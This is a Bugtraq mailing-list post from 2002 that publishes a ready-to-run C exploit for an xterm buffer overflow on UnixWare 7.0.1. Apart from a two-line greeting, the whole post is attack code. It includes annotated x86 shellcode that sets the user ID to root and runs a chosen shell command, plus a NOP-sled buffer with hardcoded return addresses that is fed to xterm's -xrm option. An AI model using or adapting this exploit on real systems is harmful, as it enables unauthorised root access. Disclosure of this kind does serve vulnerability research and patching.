xterm exploit in Unixware 7.0.1
Date: 8 Jan 2002 06:08:40 -0000
From: jG gM <jggm@mail.com>
To: bugtraq@securityfocus.com
Subject: xterm exploit in Unixware 7.0.1
Hi.
I'm jGgM.
Here is xterm exploit code in Unixware 7.0.1
http://www.netemperor.com/
Mail: jggm@mail.com
--------------------------------------------------------/*
* xterm buffer overflow by jGgM
* http://www.netemperor.com/en/
* EMail: jggm@mail.com
*
*/
#include <stdio.h>
#include <stdlib.h>
char shell[] =
/* 0 */ "\xeb\x5f" /* jmp
springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall
0x7,0x0 */
/* 9 */ "\xc3" /* ret */
/* start: */
/* 10 */ "\x5e" /* popl %esi
*/
/* 11 */ "\x31\xc0" /* xor %eax,%
eax */
/* 13 */ "\x89\x46\x9d" /* movl %eax,-
0x63(%esi) */
/* 16 */ "\x88\x46\xa2" /* movb %al,-
0x5e(%esi) */
/* seteuid: */
/* 19 */ "\x31\xc0" /* xor %eax,%
eax */
/* 21 */ "\x50" /* pushl %eax
*/
/* 22 */ "\xb0\x8d" /* movb $0x8d,%
al */
/* 24 */ "\xe8\xe5\xff\xff\xff" /* call
syscall */
/* 29 */ "\x83\xc4\x04" /* addl $0x4,%
esp */
/* setuid: */
/* 32 */ "\x31\xc0" /* xor %eax,%
eax */
/* 34 */ "\x50" /* pushl %eax
*/
/* 35 */ "\xb0\x17" /* movb $0x17,%
al */
/* 37 */ "\xe8\xd8\xff\xff\xff" /* call
syscall */
/* 42 */ "\x83\xc4\x04" /* addl $0x4,%
esp */
/* execve: */
/* 45 */ "\x31\xc0" /* xor %eax,%
eax */
/* 47 */ "\x50" /* pushl %eax
*/
/* 48 */ "\x56" /* pushl %esi
*/
/* 49 */ "\x8b\x1e" /* movl (%esi),%
ebx */
/* 51 */ "\xf7\xdb" /* negl %
ebx */
/* 53 */ "\x89\xf7" /* movl %esi,%
edi */
/* 55 */ "\x83\xc7\x10" /* addl $0x10,%
edi */
/* 58 */ "\x57" /* pushl %edi
*/
/* 59 */ "\x89\x3e" /* movl %edi,(%
esi) */
/* 61 */ "\x83\xc7\x08" /* addl $0x8,%
edi */
/* 64 */ "\x88\x47\xff" /* movb %al,-0x1
(%edi) */
/* 67 */ "\x89\x7e\x04" /* movl %edi,0x4
(%esi) */
/* 70 */ "\x83\xc7\x03" /* addl $0x3,%
edi */
/* 73 */ "\x88\x47\xff" /* movb %al,-0x1
(%edi) */
/* 76 */ "\x89\x7e\x08" /* movl %edi,0x8
(%esi) */
/* 79 */ "\x01\xdf" /* addl %ebx,%
edi */
/* 81 */ "\x88\x47\xff" /* movb %al,-0x1
(%edi) */
/* 84 */ "\x89\x46\x0c" /* movl %eax,0xc
(%esi) */
/* 87 */ "\xb0\x3b" /* movb $0x3b,%
al */
/* 89 */ "\xe8\xa4\xff\xff\xff" /* call
syscall */
/* 94 */ "\x83\xc4\x0c" /* addl $0xc,%
esp */
/* springboard: */
/* 97 */ "\xe8\xa4\xff\xff\xff" /* call start
*/
/* data: */
/* 102 */ "\xff\xff\xff\xff" /* DATA
*/
/* 106 */ "\xff\xff\xff\xff" /* DATA
*/
/* 110 */ "\xff\xff\xff\xff" /* DATA
*/
/* 114 */ "\xff\xff\xff\xff" /* DATA
*/
/* 118 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /*
DATA */
/* 126 */ "\x2d\x63\xff"; /*
DATA */
#define NOP 0x90
#define LEN 102
#define BUFFER_SIZE 1052
#define RET_LENGTH 12
int
main(int argc, char *argv[])
{
char start_addr[4];
char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1];
char *command;
long offset, ret, start_address;
int len, x, y, shell_start;
if(argc > 3 || argc < 2) {
fprintf(stderr, "Usage: %s [command] [offset]\n",
argv[0]);
exit(1);
} // end of if..
command = argv[1];
if(argc == 3) offset = atol(argv[2]);
else offset = 0;
len = strlen(command);
len++;
len = -len;
shell[LEN+0] = (len >> 0) & 0xff;
shell[LEN+1] = (len >> 8) & 0xff;
shell[LEN+2] = (len >> 16) & 0xff;
shell[LEN+3] = (len >> 24) & 0xff;
start_address = (long)&start_addr;
//ret = start_address - offset;
//ret = start_address - 1080 - offset;
ret = 0x8047910 - offset; // this is very very stupid
for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;
x = BUFFER_SIZE - strlen(command) - strlen
(shell);
for(y=0; y<strlen(shell); y++)
buffer[x++] = shell[y];
for(y=0; y<strlen(command); y++)
buffer[x++] = command[y];
for(y=0; y<RET_LENGTH; y++, x += 4)
*((int *)&buffer[x]) = ret;
buffer[x] = 0x00;
printf("start_address = 0x%x\n", start_address);
printf("ret = 0x%x,\n", ret);
printf("offset = %d\n", offset);
printf("command = %s\n", command);
printf("buffer size = %d\n", strlen(buffer));
execl("/usr/X/bin/xterm", "xterm", "-xrm", buffer,
NULL);
printf("exec failed\n");
}
